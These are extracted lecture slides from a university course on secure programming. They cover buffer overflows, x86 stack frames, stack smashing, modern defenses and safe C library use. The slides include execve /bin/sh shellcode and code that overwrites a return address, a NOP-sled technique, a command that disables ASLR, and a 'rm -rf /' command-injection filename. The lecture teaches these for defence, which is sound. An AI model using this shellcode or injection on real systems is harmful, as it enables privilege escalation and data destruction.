Secure Programming II: The Revenge

Lecture for 5/11/20

(slides from Prof. Dooley)

CS 330 Secure Programming 13 Administrivia

• Seminar on Tuesday (5/12, 7pm): Tech Career Tips and Strategies for International Students (Extra credit!)

• HW 6 (password cracking) due Thursday night

CS 330 Secure Programming Recall: Secure programming problems

• Resource exhaustion • Incomplete mediation (checking valid data) • Time-of-check to time-of-use errors • Other race conditions • Numeric over/underflow • Trust in general (users and privileges, environment variables, trusting other programs)

CS 330 Secure Programming 15 General principles of secure software

• Simplicity is a virtue • If code is complex, you don’t know if it’s right (but it probably isn’t) • In a complex system, isolate the security-critical modules. Make them simple • Modules should have a clean, clear, precisely defined interface

CS 330 Secure Programming 16 General principles of secure software - 2

• Reliance on global state is bad (usually) • Reliance on global variables is bad (usually) • Use of explicit parameters makes input assumptions explicit • Validate all input data • Don’t trust the values of environment variables • Don’t trust library functions that copy data

CS 330 Secure Programming 17 Buffer Overflows

CS 330 Secure Programming Buffer Overflow • 1988: Morris worm exploits buffer overflows in fingerd to infect 6,000 Unix servers

• 2001: Code Red exploits buffer overflows in IIS to infect 250,000 servers – Single largest cause of vulnerabilities in CERT advisories – Buffer overflow threatens Internet- WSJ(1/30/01)

• CERT advisory dated 12 April 2005 notes several vulnerabilities in MS Windows, including three buffer overflows in Explorer, MSN Messenger, and MS Exchange Server.

CS 330 Secure Programming 19 More buffer overflows

• A buffer overflow in Apple’s Quicktime (January 7, 2007)

• Buffer overflows in Mozilla products (December 20, 2006)

CS 330 Secure Programming 20 Recent Buffer Overflow Exploits

• 01/20/2016 - Oracle Outside In versions 8.5.2 and earlier contain stack buffer overflow vulnerabilities in the parsers for WK4, Doc, and Paradox DB files, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. • 06/29/2016 - WECON LeviStudio BaseSet ScrIDWordAddr Buffer Overflow Remote Code Execution Vulnerability ZDI- 16-384: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WECON LeviStudio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. CS 330 Secure Programming 21 More Buffer Overflow

• Just so you shouldn’t be too complacent, CERT also lists an advisory with a buffer overflow problem in McAfee’s Virus Scan Engine! • http://www.kb.cert.org/vuls/id/361180

CS 330 Secure Programming 22 Basics of Buffer Overflows

• A buffer, of course, is an area of memory that you set aside to hold data for your program – it can be a string (char name[30]) – or an array of structures – (struct employee gburg_div[MAX];) – or just an array of pointers to other buffers – (struct account *checking[FOO];)

CS 330 Secure Programming 23 Basics of Buffer Overflows

• Buffers are everywhere in your programs

• In languages like C and C++, you can make them dynamically using system functions like malloc() and realloc() and free them using free()

• In object oriented languages, you can also make them dynamically by instantiating new objects

• Remember an array is an object in Java, so – int [ ] myList = new int[42]; // is an object

CS 330 Secure Programming 24 What is a buffer overflow?

• A buffer overflow occurs when your program (either through an inadvertent use or a malicious attack) allows data to be written outside the boundary of the buffer – usually to memory immediately after the buffer

CS 330 Secure Programming 25 What is a buffer overflow?

• If the buffer is on the stack this is called a stack overflow or more colorfully “smashing the stack”

• How does a buffer get on the stack? – if it’s a local variable or function arguments

• This is possible because many programming languages and operating systems don’t do bounds checking on buffers

CS 330 Secure Programming 26 Why is this a security problem?

• Overflowed data could be anything – A pointer that tells the program what instructions to execute next. (i.e. a pointer to a different function or return address on the stack) – An integer where “0” means that you can’t access a particular file and and “1” means you can. A hacker would overwrite the “0” with a “1” and access the file – Even a minor change could cause the program to crash which can be a security problem (denial-of-service attacks and core dump exploits are very serious)

CS 330 Secure Programming 27 How could this happen?

• The programmer might not check the size of the buffer first before trying to put all of the data into it

• Languages like C/C++ don’t automatically check the bounds of the buffer

CS 330 Secure Programming 28 How could this happen?

• Programmers who use C/C++ are responsible for performing this check. Often they don’t

• The problem can be a lot more complex when you start talking about supporting international character sets and copying/ formatting/ processing buffers that store different kinds of things

CS 330 Secure Programming 29 Technical Details...

CS 330 Secure Programming L/Unix permission structures

Every file has a number of bits of permissions associated with it • Owner/User - rwx • Group - rwx • Other - rwx • Setuid bit – Real vs effective userid and groupid • Directory/regular file bit • Sticky bit

CS 330 Secure Programming L/Unix Process memory image

Allocators request additional heap memory from the operating system using the sbrk() function

CS 330 Secure Programming 32 • Integer Registers IA32/Linux Register – Two have special uses Usage • %ebp, %esp

– Three managed as Caller-Save %eax Temporaries callee-save %edx • %ebx, %esi, %edi %ecx • Old values saved on Callee-Save %ebx stack prior to using Temporaries – Three managed as %esi caller-save %edi • %eax, %edx, %ecx Special %esp • Do what you please, but %ebp expect any callee to do In the x86-64 architecture there so, as well are also %rax, %rbx, %rsp, %rbp, – Register %eax also etc. stores returned value CS 330 Secure Programming 33 x86-64 Registers

The program instruction counter %rip is also available.

CS 330 Secure Programming 34 Copying Data and Registers

• Moving Data (Really Copying) – movl Source,Dest • Move 4-byte (“long”) word – Accounts for 31% of all instructions in sample

CS 330 Secure Programming 35 Addressing Modes for i86

• Immediate: Constant integer data • Like C constant, but prefixed with ‘$’ • E.g., $0x400, $-533 • Encoded with 1, 2, or 4 bytes • Register: One of 8 integer registers • But %esp and %ebp reserved for special use • Others have special uses for particular instructions • Memory: 4 consecutive bytes of memory • Various addressing modes • value(%register) • E.g. 8(%eax) is c(eax) + 8 used as mem address CS 330 Secure Programming 36 IA32 Simple Addressing Modes

• Normal (R) Mem[Reg[R]] – Register R specifies memory address – movl (%ecx), %eax => int t = *p;

• Displacement D(R) Mem[Reg[R]+D] – Register R specifies start of memory region – Constant displacement D specifies offset – movl 8(%ecx),%edx => int t = p[2]; – movl 8(%ebp),%edx => int t = some_arg; • %ebp, %esp used to reference stack. Stack contains arguments to function

CS 330 Secure Programming 37 movl Operand Combinations – Cannot do memory-memory transfers with single instruction • Example of NON-ORTHOGONALITY in the IA32 ISA – Makes it much harder to program or compile for

Source Destination C Analog Reg movl $0x4,%eax eax = 0x4; Imm Mem movl $-147,(%eax) *eax = -147;

edx = eax; movl %eax,%edx movl Reg Reg Mem movl %eax,(%edx) *edx = eax;

Mem Reg movl (%eax),%edx edx = *eax; CS 330 Secure Programming 38 IA32 Stack

– Register %esp (%rsp) indicates Stack “Bottom” lowest allocated position in stack (top) – Pushing – pushl src Stack Increasing – Fetch operand at src Pointer Addresses – Decrement %esp by 4 %esp – Write operand at address given by %esp • Popping Stack Grows Down – popl dest – Read operand at address given by %esp Stack “Top” – Increment %esp by 4 – Write to dest CS 330 Secure Programming 39 IA32 Stack Discipline

• ret – Pops into %eip (returns to next next instruction after call) • Stack “frame” stores the context in which the procedure operates • Stack-based languages – Stack stores context of procedure calls – Multiple calls to a procedure can be outstanding simultaneously

CS 330 Secure Programming 40 Executing Functions 0x00001f50 : push %ebp 0x00001f51 : mov %esp,%ebp 0x00001f53 : sub $0x28,%esp

These three lines (or something like them) are called the Function Prologue, and it's automatically added by the GCC compiler on the standard x86 (32-bit) and x86_64 (64-bit) architectures.

The Function Prologue has one purpose - to preserve the value of the base pointer of the previous frame on the stack, that is, the calling function's stack frame.

On the 32-bit architecture, the EBP register is used for this purpose, on the 64-bit architecture, the RBP register. CS 330 Secure Programming 41 Similarly, at the end of the assembly dump, there's the Function Epilogue, which does exactly the same as the Prologue, in reverse. The epilogue typically consists of the leave and ret instructions.

CS 330 Secure Programming 42 IA32 Stack Frame Example

.text Consider the code: .globl _function _function: pushl %ebp movl %esp, %ebp void foo(int a, int b, int c) { subl $40, %esp char buf1[8]; leave #the function epilogue ret char buf2[16]; .globl _main _main: } pushl %ebp void main( ) { movl %esp, %ebp subl $24, %esp foo(1, 2, 3); movl $3, 8(%esp) movl $2, 4(%esp) } movl $1, (%esp) call _function See leave BufferOverflow/0OverflowExample/WakeExamples/simple.c ret CS 330 Secure Programming IA32/Linux Stack Frame

• Callee Stack Frame (“Top” to Caller’s Stack Frame Bottom) – Parameters for called functions c – Local variables b – Saved register context a – Old frame pointer return address • Caller Stack Frame (SFP) Stack Frame Pointer – Return address buf1 • Pushed by call instruction – Arguments for this call buf2 %esp Stack Ptr ==>

Low mem addr ==>

CS 330 Secure Programming 44 Smashing the Stack for Fun and Profit - updated for 2016 (original paper by Aleph One, 1996)

• Review: Process memory organization • The problem: Buffer overflows • How to exploit the problem • Implementing the Exploit • Results • Conclusion and discussion

CS 330 Secure Programming Process Memory Organization - x86

CS 330 Secure Programming Process Memory Organization - x86

CS 330 Secure Programming Process Memory Organization grows this way

CS 330 Secure Programming Function Calls

CS 330 Secure Programming Function Calls

CS 330 Secure Programming WakeExamples/ovflow1.c Buffer Overflows void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Buffer Overflows

CS 330 Secure Programming Modifying the Execution Flow WakeExamples/ovflow2.c

Need to fix the constants for void function() { this example. char buffer1[4]; int *ret; Also compile with -fno-stack- protector and -z execstack. ret = buffer1 + 8; (*ret) += 8; Do this in SEED-Ubuntu. } int main() { int x = 0; function(); x = 1; printf("%d\n",x); }

CS 330 Secure Programming Modifying the Execution Flow

CS 330 Secure Programming Modifying the Execution Flow

CS 330 Secure Programming Modifying the Execution Flow

CS 330 Secure Programming Modifying the Execution Flow

CS 330 Secure Programming Exploiting Overflows- Smashing the Stack • Now we can modify the flow of execution- what do we want to do now?

• Spawn a shell and issue commands from it

CS 330 Secure Programming 65 Exploiting Overflows - Smashing the Stack • Now we can modify the flow of execution- what do we want to do now?

• Spawn a shell and issue commands from it

CS 330 Secure Programming Exploiting Overflows - Smashing the Stack

• What if there is no code to spawn a shell in the program we are exploiting?

• Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

CS 330 Secure Programming 67 Exploiting Overflows- Smashing the Stack

What if there is no code to spawn a shell in the program we are exploiting?

Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

CS 330 Secure Programming Implementing the Exploit

• Writing and testing the code to spawn a shell • Putting it all together- an example of smashing the stack • Exploiting a real target program

CS 330 Secure Programming .c Spawning a Shell

#include #include void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); Use objdump -d to take a look at the assembly code & relative } addresses.

Take this program (which spawns a shell and compile it to assembly language

CS 330 Secure Programming Spawning a Shell

char shellcode[] = { "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b " "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd " "\x80\xe8\xdc\xff\xff\xff/bin/sh" };

CS 330 Secure Programming Testing the Shellcode

char shellcode[] = { "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh" }; void main() { smash.c int *ret; ret = (int *) &ret + 2; (*ret) = (int) shellcode; }

CS 330 Secure Programming Testing the Shellcode

Note that in C, the +2 is +2 integers, or 8 bytes.

CS 330 Secure Programming Testing the Shellcode

CS 330 Secure Programming 74 Putting it all Together char shellcode[]="\xeb\x1f\…. \xb0\x0b\xff/bin/sh"; char large_string[128]; void main() { smashAll.c char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); }

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Putting it all Together

CS 330 Secure Programming Exploiting a real program

But these techniques don’t work as well as they used to…

CS 330 Secure Programming 82 Some good news.....

• It is much harder to smash the stack these days because of some modern defenses – NX bit and – gcc and clang StackGuard/ProPolice – address space layout randomization (ASLR)

CSCS 330 330 Secure Programming 83 In order to do a stack smashing exploit, you need to place the code you want to execute in the stack or data segment of the program and transfer control to it.

You used to do this by creating a global array in the data segment and then transferring control (via the return address on the stack) to that location.

CSCS 330 330 Secure Programming 84 BUT, recent x86 architectures, operating systems and compilers use Intel's eXecute Disable Bit (XD by Intel) (called NX in Linux-land) that makes the above statement pretty much moot.

In new versions of modern OSs (Linux, Windows, and OS X among them), jumping to the data segment to execute code will more than likely cause a segmentation fault because those data segments will most likely be stored in a memory page that has the NX bit set.

CS 330 Secure Programming 85 • Recent versions of gcc (and other compilers) implement a canary called ProPolice (originally from IBM) that puts a guard at the end of the stack frame

The basic idea is to place a chosen or pseudo-random value between a stack frame's data elements (e.g. char *buffer) and its control elements (e.g. RET address, stored EBP, etc.) that is impossible for an attacker to predict. Before the function whose frame has been clobbered is allowed to return, this canary is checked against a known good value. If that check fails, the process terminates, since it now considers its execution path to be in an untrusted state.

You can turn it off using -fno-stack-protector

CSCS 330 330 Secure Programming 86 • Newer compilers also tend to allocate much more stack space than older versions did (memory is cheap), so it's harder to overflow the stack.

CSCS 330 330 Secure Programming 87 Address Space Layout Randomization

Almost any recent Linux and OS X kernel will by default randomize the address of the stack, the base address for memory areas allocated by mmap, the brk() base address, and the address of the vdso (a virtual dynamically-linked shared object) page of a program, at exec() time. (In particular, shared libraries will be loaded at randomized addresses.)

On Linux machines you can disable this via # echo 0 > /proc/sys/kernel/randomize_va_space

But this won’t work on OS X (there’s no /proc file system).

CSCS 330 330 Secure Programming 88 Exploiting a Real Program

• It’s easy to execute our attack when we have the source code

• What about when we don’t? How will we know what our return address should be?

CS 330 Secure Programming How to find Shellcode

1. Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction

CS 330 Secure Programming How to find Shellcode

2. Pad shellcode with NOP’s then guess (called the NOP slide) - we don’t need to be exactly on - much more efficient

CS 330 Secure Programming Small Buffer Overflows

• If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our code

• Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory

• Can make environment variable as large as you want

• Only works if you have access to environment variables

CS 330 Secure Programming Summary

• ‘Smashing the stack’ works by injecting code into a program using a buffer overflow, and getting the program to jump to that code

• By exploiting a root program, user can call exec(“/bin/shell”) and gain root access

CS 330 Secure Programming Summary

• Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT)

• Are relatively easy to exploit

• Many variations on stack smash- heap overflows, internet attacks, etc.

CS 330 Secure Programming Spawning a Shell void main() {__asm__(" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx Then we assemble it to int $0x80 object code call -0x2f (you can find the object .string \"/bin/sh\" "); } code by using objdump CS 330 Secure Programming or gdb) Preventing Buffer Overflows (for C programmers)

• Well, clearly scenarios like the last one are bad. • How to prevent them?

CS 330 Secure Programming 96 What can cause buffer overflows?

• Careless use of buffers without bounds checking. • Formatting and logical errors. • Unsafe library function calls. • Off-by-one errors. • Old code used for new purposes (like UNICODE international characters). • All sorts of other far-fetched but deadly-serious things you should think about.

CS 330 Secure Programming 97 Careless use of buffers w/o bounds checking

• This is the classic case and the easiest to prevent. • Remember that C/C++ doesn’t do automatic bounds checking for you. • If you declare an array as int A[100] there is nothing in the C language to stop you from executing a statement like A[555] = 1234; • You don’t need to access an array with an invalid index to have a buffer overflow. • Pointer arithmetic is an equally likely culprit

CS 330 Secure Programming 98 Use of buffers w/o bounds checking - Consequences

• If the buffer overflow is big enough the attacker can hijack the machine. • In UNIX, a buffer overflow of less than 50 bytes in a process that has root privileges can be used to “spin a shell” • The attacker obtains a command shell with root privileges.

CS 330 Secure Programming 99 • Hijacking the machine can also be done by a worm as it spreads.

• Never assume that small buffers are safe • Attack code can be placed in another buffer, beyond the return pointer, or on the heap.

CS 330 Secure Programming 100 Buffered consequences?

• Any security sensitive data that follows the buffer can be overwritten – passwords or variables that designate privileges. • The software might crash – This can cause a core dump giving the attacker access to any security-sensitive data that was in the program’s memory at the time of the core dump

CS 330 Secure Programming 101 Bounds checking - Recommendations

• Before you copy to, format, or send input to a buffer, make sure it is big enough to hold whatever might be thrown at it • Testing should catch most of this kind of buffer overflow

• If there is a buffer overflow, the software should crash or data should get corrupted if a very long string is given

CS 330 Secure Programming 102 Formatting and logical errors – Problem

• The size in bytes of the input might not be what causes the buffer overflow, it might be the input itself – if you’re converting a large integer to a string, make sure the buffer is long enough to hold all possible outputs.

CS 330 Secure Programming 103 Formatting and logical errors – Consequences

• Even if the attacker has very little control of the data that overwrites a return pointer, they can always crash the program by sending the program control to random places in memory

• Crashing the program is a security risk for many reasons, including denial-of-service attacks and core dumps of security-sensitive data

• It’s never safe to assume that a clever attacker can’t find a way to give input that causes the output he wants

CS 330 Secure Programming 104 Formatting and logical errors – Recommendations

• Always test a variety of inputs to make sure the program behavior is what you expect • Code inspection is likely to catch buffer overflow errors that testing doesn’t • Assume that ALL buffer overflows are security problems • Don’t assume that all buffer overflows are caused by long strings

CS 330 Secure Programming 105 Unsafe library calls - Problem

• Unsafe library functions are one of the main constituents of the buffer overflow problem • Many library functions don’t do bounds checking unless explicitly told to • Many functions use format strings – open the door to all sorts of weird exploits

CS 330 Secure Programming 106 Unsafe library calls - Consequences

• Most library function calls that result in buffer overflows allow the attacker to hijack the machine using stack smashing • They also can corrupt security-sensitive data or crash the program

CS 330 Secure Programming 107 CS 330 Secure Programming 108 Unsafe Unix library calls - Recommendations

• Only use functions that do bounds checking • Never, ever, ever use gets(). Only under freak conditions will it NOT cause a buffer overflow. Use fgets() instead • Also avoid functions like strcpy() and strcat(). Use strncpy() and strncat() instead • Use precision specifiers with the scanf() family of functions (scanf(), fscanf(), sscanf(), etc.). Otherwise they will not do any bounds checking for you

CS 330 Secure Programming 109 Unsafe Unix library calls - Recommendations

• Be careful with sprintf(). Use precision specifiers or use snprintf() instead • Never use variable format strings with the printf() family of functions • Every file or path handling library function has its own quirks, so be careful

CS 330 Secure Programming 110 C Library Call Recommendations

• Functions like fgets(), strncpy(), and memcpy() are okay – make sure your buffer is the size you say it is. Be careful of off-by-one errors

CS 330 Secure Programming 111 consider the following piece of code: And one more library call... char buffer[BUFFERLEN]; char *filename;

/* We read filename from the user somehow */ snprintf(buffer, sizeof(buffer), "cat %s", filename); system(buffer); consider what happens if the user gives us a versus filename like "/etc/hosts ; rm -rf /"

char *filename;

/* We read filename from the user somehow */

execl("/bin/cat", "/bin/cat", filename, NULL);

CS 330 Secure Programming 112 C Library Call Recommendations

• A very useful tool to aid with finding unsafe library function calls during code inspection are static analyzers such as ITS4

• Testing will catch many, but not all, buffer overflows. Code inspection in combination with testing will produce the best results

CS 330 Secure Programming 113 Off-by-one errors - Problem

• Occur when a programmer takes the proper precautions in terms of bounds checking, but maybe puts a 512 where she should have put a 511 • Can happen to the best programmers no matter how well- informed they are about buffer overflows

CS 330 Secure Programming 114 Off-by-one errors - Consequences

• Usually off-by-one errors can do no more than crash the program • They can be made to compromise security-sensitive data

• But any buffer overflow is a security risk

CS 330 Secure Programming 115 Off-by-one errors - Recommendations

• If you have a 512 byte buffer you can only store 511 characters in the string (the last character is a NULL) • If you use scanf() to read into a buffer you also have to account for the NULL: – use scanf(“%511s”, &My512ByteBuffer) instead of – scanf(“%512s”, &My512ByteBuffer) or – scanf(“%s”, &MY512ByteBuffer)

CS 330 Secure Programming 116 Off-by-one errors - Recommendations

• If you declare an array as int A[100], remember that you can’t access A[100], the highest index you can access is A[99] and the lowest is A[0]

• The best defense against off-by-one errors of any kind is a thorough combination of testing and code inspection

CS 330 Secure Programming 117 Old code used for new purposes - Problem

• Often old code is reused in new projects

• Even if the old code was thoroughly tested and written in a safe manner, it might not have accounted for things that the new code expects it to support, – like international character sets

CS 330 Secure Programming 118 Old code used for new purposes - Consequences • “HELLO” in ASCII is 0x48-0x45-0x4C-0x4C-0x4F • “HELLO” in UNICODE is 0x00-0x48-0x00-0x45-0x00-0x4C-0x00-0x4C-0x00-0x4F • The old code might tell the new code to give it no more than 5 characters because it uses a 5-byte buffer • The new code gives it 5 characters, but in UNICODE instead of ASCII, so they fill 10 bytes • Assuming 5 characters = 5 bytes is dangerous

CS 330 Secure Programming 119 Old code used for new purposes - Consequences

• This is more common and more easily exploitable than you might think. • A “Venetian exploit” can hijack a program with a reasonably sized buffer overflow even if UNICODE format forces the attacker to have half of his attack code bytes be zeros.

CS 330 Secure Programming 120 Old code for new purposes - Recommendations • Enumerate and challenge all assumptions you’ve made about the interaction between old code and new • Test thoroughly • If your software allows the user to use UNICODE, then repeat all tests with UNICODE • Include the old code in code inspection • Test code on every type of platform it will likely be used on – Depending on how the processor arranges memory, an off-by-one error of a single byte could have no effect on one architecture, but cause a bug on another

CS 330 Secure Programming 121 All sorts of other far-fetched but deadly- serious things you should think about - Problem

• Sometimes seemingly reasonable assumptions are just not true

• Attackers have plenty of time and infinite creativity

• A thoroughly tested and inspected piece of software might still be vulnerable through a series of a half dozen or so clever tricks

CS 330 Secure Programming 122 All sorts of other far-fetched but deadly- serious things you should think about - Consequences

• Your software might be a UNIX utility that spawns two processes • One sets an environment variable to either “CHUCKY” or “CHEESE”, and the second reads it

CS 330 Secure Programming 123 All sorts of other far-fetched but deadly- serious things you should think about - Consequences

• The reading process doesn’t bother to check the size before it writes buffer because it is just an environment variable you made up and is guaranteed to have six characters, right?

• There is no user I/O involved

CS 330 Secure Programming 124 All sorts of other far-fetched but deadly- serious things you should think about - Consequences

• But the attacker can force a race condition that changes the environment variable between when one process writes it and when the other process reads it. Give the environment variable more than six characters, causing a buffer overflow • Add getenv() to the long list of dangerous library functions

CS 330 Secure Programming 125 All sorts of other far-fetched but deadly- serious things you should think about - Recommendations

• Challenge all of your assumptions like an attacker would • Never assume that a well inspected and thoroughly tested piece of software is absolutely defect free

• As long as programmers use C there will always be buffer overflows, hopefully just not as many

CS 330 Secure Programming 126